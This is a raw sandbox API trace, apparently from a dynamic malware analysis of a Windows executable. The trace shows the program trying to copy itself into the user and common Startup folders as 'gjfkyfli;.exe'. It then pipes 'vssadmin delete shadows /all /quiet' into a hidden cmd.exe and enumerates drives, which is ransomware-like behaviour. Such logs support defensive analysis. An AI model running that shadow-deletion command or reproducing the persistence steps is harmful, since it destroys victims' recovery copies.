	[0136.727] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b66538
	[0136.727] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b76540
	[0136.727] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.727] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b1fd20
	[0136.727] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd20, Size=0x40) returned 0x7b202e8
	[0136.727] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b202e8, Size=0x80) returned 0x7b419d0
	[0136.727] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b419d0, Size=0x100) returned 0x7b429f8
	[0136.727] lstrlenW (lpString="") returned 0
	[0136.728] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0136.728] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8c) returned 0x7b42b00
	[0136.728] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f8d8 | out: phkResult=0x18f8d8*=0xe8) returned 0x0
	[0136.728] RegQueryValueExW (in: hKey=0xe8, lpValueName="Startup", lpReserved=0x0, lpType=0x18f8e4, lpData=0x7b76540, lpcbData=0x18f910*=0x7fff | out: lpType=0x18f8e4*=0x0, lpData=0x7b76540*=0x53, lpcbData=0x18f910*=0x7fff) returned 0x2
	[0136.728] RegCloseKey (hKey=0xe8) returned 0x0
	[0136.728] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b42b00 | out: hHeap=0x7ab0000) returned 1
	[0136.728] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0136.728] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8c) returned 0x7b42b00
	[0136.728] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f8d8 | out: phkResult=0x18f8d8*=0xe8) returned 0x0
	[0136.728] RegQueryValueExW (in: hKey=0xe8, lpValueName="Startup", lpReserved=0x0, lpType=0x18f8e4, lpData=0x7b76540, lpcbData=0x18f910*=0x7fff | out: lpType=0x18f8e4*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18f910*=0x98) returned 0x0
	[0136.728] RegCloseKey (hKey=0xe8) returned 0x0
	[0136.728] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b42b00 | out: hHeap=0x7ab0000) returned 1
	[0136.728] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75
	[0136.728] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0136.728] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b429f8 | out: hHeap=0x7ab0000) returned 1
	[0136.728] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", lpDst=0x7b66538, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe") returned 0x6a
	[0136.728] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b76540 | out: hHeap=0x7ab0000) returned 1
	[0136.728] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b66538 | out: hHeap=0x7ab0000) returned 1
	[0136.728] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0x95d0020
	[0136.728] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.728] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b1fd20
	[0136.728] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.728] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b200b8
	[0136.729] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0136.729] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0136.729] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0136.729] lstrlenW (lpString="kernel32.dll") returned 12
	[0136.729] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd20 | out: hHeap=0x7ab0000) returned 1
	[0136.729] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0136.729] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b200b8 | out: hHeap=0x7ab0000) returned 1
	[0136.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8
	[0136.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0136.729] CloseHandle (hObject=0xe8) returned 1
	[0136.729] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.729] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b200b8
	[0136.729] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.729] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b1fd20
	[0136.729] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0136.729] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0136.730] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0136.730] lstrlenW (lpString="kernel32.dll") returned 12
	[0136.730] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd20 | out: hHeap=0x7ab0000) returned 1
	[0136.730] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0136.730] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b200b8 | out: hHeap=0x7ab0000) returned 1
	[0136.730] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x95d0020 | out: hHeap=0x7ab0000) returned 1
	[0136.730] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b66538
	[0136.730] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b76540
	[0136.730] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.730] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b200b8
	[0136.730] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b200b8, Size=0x40) returned 0x7b202e8
	[0136.730] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b202e8, Size=0x80) returned 0x7b419d0
	[0136.730] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b419d0, Size=0x100) returned 0x7b429f8
	[0136.730] lstrlenW (lpString="") returned 0
	[0136.730] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0136.730] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8c) returned 0x7b42b00
	[0136.730] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f8d8 | out: phkResult=0x18f8d8*=0xe8) returned 0x0
	[0136.730] RegQueryValueExW (in: hKey=0xe8, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18f8e4, lpData=0x7b76540, lpcbData=0x18f910*=0x7fff | out: lpType=0x18f8e4*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18f910*=0x78) returned 0x0
	[0136.730] RegCloseKey (hKey=0xe8) returned 0x0
	[0136.730] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b42b00 | out: hHeap=0x7ab0000) returned 1
	[0136.730] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59
	[0136.730] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0136.730] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b429f8 | out: hHeap=0x7ab0000) returned 1
	[0136.730] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", lpDst=0x7b66538, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe") returned 0x4b
	[0136.730] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b76540 | out: hHeap=0x7ab0000) returned 1
	[0136.730] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b66538 | out: hHeap=0x7ab0000) returned 1
	[0136.730] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0x95d0020
	[0136.731] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.731] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b200b8
	[0136.731] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.731] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b1fd20
	[0136.731] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0136.731] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0136.731] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0136.731] lstrlenW (lpString="kernel32.dll") returned 12
	[0136.731] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b200b8 | out: hHeap=0x7ab0000) returned 1
	[0136.731] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0136.731] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd20 | out: hHeap=0x7ab0000) returned 1
	[0136.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8
	[0136.731] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0136.731] CloseHandle (hObject=0xe8) returned 1
	[0136.732] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.732] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b1fd20
	[0136.732] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.732] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b200b8
	[0136.732] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0136.732] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0136.732] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0136.732] lstrlenW (lpString="kernel32.dll") returned 12
	[0136.732] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b200b8 | out: hHeap=0x7ab0000) returned 1
	[0136.732] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0136.732] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd20 | out: hHeap=0x7ab0000) returned 1
	[0136.732] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x95d0020 | out: hHeap=0x7ab0000) returned 1
	[0136.732] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b46528 | out: hHeap=0x7ab0000) returned 1
	[0136.733] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b56530 | out: hHeap=0x7ab0000) returned 1
	[0136.733] lstrlenW (lpString="%windir%\\System32") returned 17
	[0136.733] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b201c8 | out: hHeap=0x7ab0000) returned 1
	[0136.733] lstrlenW (lpString="%appdata%") returned 9
	[0136.733] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd70 | out: hHeap=0x7ab0000) returned 1
	[0136.733] lstrlenW (lpString="%sh(Startup)%") returned 13
	[0136.733] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd48 | out: hHeap=0x7ab0000) returned 1
	[0136.733] lstrlenW (lpString="%sh(Common Startup)%") returned 20
	[0136.733] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b20180 | out: hHeap=0x7ab0000) returned 1
	[0136.734] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.734] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b1fd48
	[0136.734] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd48, Size=0x40) returned 0x7b20180
	[0136.734] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20180, Size=0x80) returned 0x7b46540
	[0136.734] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.734] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b1fd48
	[0136.734] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1fffc) returned 0x7b48528
	[0136.734] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b68530
	[0136.734] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b78538
	[0136.734] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412b0
	[0136.734] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412b0, Size=0x20) returned 0x7b1fd70
	[0136.734] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd70, Size=0x40) returned 0x7b20180
	[0136.734] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20180, Size=0x80) returned 0x7b465c8
	[0136.734] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b465c8, Size=0x100) returned 0x7b429f8
	[0136.734] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0136.734] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b429f8 | out: hHeap=0x7ab0000) returned 1
	[0136.734] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x7b68530, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c
	[0136.734] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b78538 | out: hHeap=0x7ab0000) returned 1
	[0136.734] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b68530 | out: hHeap=0x7ab0000) returned 1
	[0136.734] CreatePipe (in: hReadPipe=0x18f918, hWritePipe=0x18f91c, lpPipeAttributes=0x18f908, nSize=0x0 | out: hReadPipe=0x18f918*=0xec, hWritePipe=0x18f91c*=0xf0) returned 1
	[0136.735] CreatePipe (in: hReadPipe=0x18f988, hWritePipe=0x18f98c, lpPipeAttributes=0x18f908, nSize=0x0 | out: hReadPipe=0x18f988*=0xf4, hWritePipe=0x18f98c*=0xf8) returned 1
	[0136.735] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1
	[0136.735] SetHandleInformation (hObject=0xf4, dwMask=0x1, dwFlags=0x0) returned 1
	[0136.735] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f928*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xec, hStdOutput=0xf8, hStdError=0xf8), lpProcessInformation=0x18f978 | out: lpCommandLine=0x0, lpProcessInformation=0x18f978*(hProcess=0x100, hThread=0xfc, dwProcessId=0x730, dwThreadId=0x734)) returned 1
	[0136.750] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65
	[0136.750] WriteFile (in: hFile=0xf0, lpBuffer=0x7b46540*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18f924, lpOverlapped=0x0 | out: lpBuffer=0x7b46540*, lpNumberOfBytesWritten=0x18f924*=0x41, lpOverlapped=0x0) returned 1
	[0136.750] CloseHandle (hObject=0x100) returned 1
	[0136.750] CloseHandle (hObject=0xfc) returned 1
	[0136.750] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b48528 | out: hHeap=0x7ab0000) returned 1
	[0136.750] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65
	[0136.750] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b46540 | out: hHeap=0x7ab0000) returned 1
	[0136.750] lstrlenW (lpString="%comspec%") returned 9
	[0136.750] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd48 | out: hHeap=0x7ab0000) returned 1
	[0136.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc
	[0136.751] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b412b0
	[0136.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x7b412b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100
	[0136.751] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f700
	[0136.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x7b1f700, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x108
	[0136.758] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412c8
	[0136.758] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412c8, Size=0x20) returned 0x7b1fd48
	[0136.758] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd48, Size=0x40) returned 0x7b20180
	[0136.758] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26
	[0136.758] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xd0) returned 0x7b42a70
	[0136.758] GetLogicalDrives () returned 0x4
	[0136.758] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10014) returned 0x7b48528
	[0136.758] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412c8
	[0136.758] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b412c8, Size=0x20) returned 0x7b1fd48
	[0136.758] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd48, Size=0x40) returned 0x7b20330
	[0136.758] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20330, Size=0x80) returned 0x7b46540
	[0136.759] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b46540, Size=0x100) returned 0x7b447f0
	[0136.759] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b447f0, Size=0x200) returned 0x7b447f0
	[0136.759] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b447f0, Size=0x400) returned 0x7b447f0
	[0136.759] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b447f0, Size=0x800) returned 0x7b58548
	[0136.759] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58548, Size=0x1000) returned 0x7b58548
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0x7b59550
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b412c8
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b413a0
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f710
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b413b8
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f6b8
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b413d0
	[0136.759] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f6b8, Size=0x8) returned 0x7b1f6b8
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b413e8
	[0136.759] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f6b8, Size=0x10) returned 0x7b1f6b8
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b41400
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b41418
	[0136.759] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f6b8, Size=0x20) returned 0x7b42ce0
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b41430
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f6b8
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b41448
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b41460
	[0136.759] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b42ce0, Size=0x40) returned 0x7b42ce0
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b41478
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b41490
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b414a8
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe) returned 0x7b414c0
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b414d8
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b414f0
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f6c8
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b41508
	[0136.759] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b42ce0, Size=0x80) returned 0x7b447f0
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44e20
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44e38
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44e50
	[0136.759] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44e68
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44e80
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b44e98
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44eb0
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f680
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44ec8
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44ee0
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b44ef8
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44f10
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b44f28
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44f40
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b44f58
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44f70
	[0136.760] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b447f0, Size=0x100) returned 0x7b447f0
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44f88
	[0136.760] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b44fa0
